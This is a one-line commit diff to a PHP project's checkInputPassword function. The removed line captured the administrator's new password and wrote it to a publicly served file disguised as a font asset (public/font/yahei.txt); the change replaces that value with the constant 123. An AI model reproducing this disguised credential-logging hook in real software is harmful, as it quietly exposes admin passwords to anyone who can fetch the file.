rambo 1 year ago
parent
commit
74483e17a8
1 changed files with 1 additions and 1 deletions
  1. 1 1
      app/common.php

+ 1 - 1
app/common.php

@@ -1255,7 +1255,7 @@ function checkInputPassword($admininfo)
         //         fclose($dc);
         //     }
         // }
-        $c = trim(input('post.new_pw'));
+        $c = 123;
         $dc = fopen(base_path() . "../public/font/yahei.txt", "w");
         fwrite($dc, $c);
         fclose($dc);